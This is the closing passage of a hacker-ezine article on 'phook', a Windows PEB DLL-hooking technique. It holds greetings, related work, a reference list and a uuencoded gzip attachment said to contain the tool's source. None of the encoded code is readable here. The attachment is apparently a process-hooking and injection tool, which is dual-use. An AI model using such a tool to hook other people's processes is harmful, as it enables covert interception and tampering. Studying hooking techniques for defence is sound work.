+    - pOpE, JKD, ilo, Ripe, int27h, at4r, uri, numitor, vikt0ry, kania,
+      remains, S-P-A-R-K ...
+      
+Other scene:
+    - sync, ryden, xenmax, ozone/membrive, \^snake^\, topo, fixgrain, ia64,
+      overdrive, success, scorpionn, oyzzo, simkin, !dSR ...
+
+ALL vx.7a69ezine.org and 7a69ezine.org people ;-)
+
+And specially tahnks to YJesus - http://www.security-projects.com
+
+
+------[ 10.- Related Works
+
+[T.1] .- We are not aware of any work similar to phook, but there is an
+         article that talks about PEB HOOKING written by Deroko: "PEB DLL
+         Hooking Novel method to Hook DLLs". The article was published in
+         the ARTeam-Ezine number 2.
+
+         - http://www.arteam.accessroot.com/ezine/file_info/download1.php?
+           file=ARTeam.eZine.Number2.rar
+
+
+------[ 11.- References
+
+[R.1] .- Structures of the PEB:
+            - http://undocumented.ntinternals.net/
+
+[R.2] .- Gaining important datas from PEB under NT boxes:
+            - http://vx.netlux.org/29a/29a-6/29a-6.224
+
+[R.3] .- Visual Studio, Microsoft Portable Executable and Common Object
+         File Format Specification. Revision 8.0 - May 16, 2006:
+            - http://www.microsoft.com/whdc/system/platform/firmware/
+              PECOFF.mspx
+
+[R.4] .- What Goes On Inside Windows 2000: Solving the Mysteries of the
+         Loader:
+            - http://msdn.microsoft.com/msdnmag/issues/02/03/Loader/
+
+[R.5] .- winnt.h (DEV-CPP):
+            - http://www.bloodshed.net/devcpp.html
+
+[R.6] - CreateProcess:
+            - http://msdn2.microsoft.com/en-us/library/ms682425(vs.80).aspx
+
+[R.7] - Three Ways to Inject Your Code into Another Process:
+            - http://www.codeproject.com/threads/winspy.asp
+
+[R.8] - Import address table hooks:
+            - http://www.securityfocus.com/infocus/1850
+
+[R.9] - Code overwriting:
+            - http://www.codeproject.com/system/hooksys.asp
+
+[R.10] - Hooks:
+            - http://msdn2.microsoft.com/en-us/library/ms632589.aspx
+
+[R.11] - System Call Optimization with the SYSENTER Instruction:
+            - http://blog.donews.com/zwell/archive/2005/03/13/300440.aspx
+
+[R.12] - Run-Time Dynamic Linking
+            - http://msdn2.microsoft.com/en-us/library/ms685090.aspx
+
+[R.13] - Thread Walking
+            - http://msdn2.microsoft.com/en-us/library/ms686780.aspx
+
+[R.14] - CreateFile
+            - http://msdn2.microsoft.com/en-us/library/aa363858.aspx
+
+[R.15] - MAN GCC (-fomit-frame-pointer):
+            - http://www.astro.uni-bonn.de/~webstw/cm/gnu/gcc/gcc.1.html
+
+[R.16] - MINGW:
+            - http://www.mingw.org/
+
+[R.17] - ReadFile:
+            - http://msdn2.microsoft.com/en-us/library/aa365467.aspx
+
+[R.18] - Registry Functions:
+            - http://msdn2.microsoft.com/en-us/library/ms724875.aspx
+            
+[R.19] - File Management Functions:
+            - http://msdn2.microsoft.com/en-us/library/aa364232.aspx
+
+[R.20] - Winsock Functions:
+            - http://msdn2.microsoft.com/en-us/library/ms741394.aspx
+
+[R.20] - MSDN LIBRARY:
+            - http://msdn2.microsoft.com/en-us/library/
+
+[R.21] - Iczelion's Win32 Assembly Homepage:
+            - http://win32assembly.online.fr/
+
+
+------[ 12.- Source Code
+
+Message-ID: <wc2007101518005420031419875@localhost>
+MIME-Version: 1.0
+Content-Description: "UU encode of phookt~1.gz by Wincode 2.7.3"
+Content-Type: application/X-gzip; name="phookt~1.gz"
+Content-Transfer-Encoding: X-uuencode
+Content-Disposition: attachment; filename="phookt~1.gz"
+
+begin 644 phookt~1.gz
+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
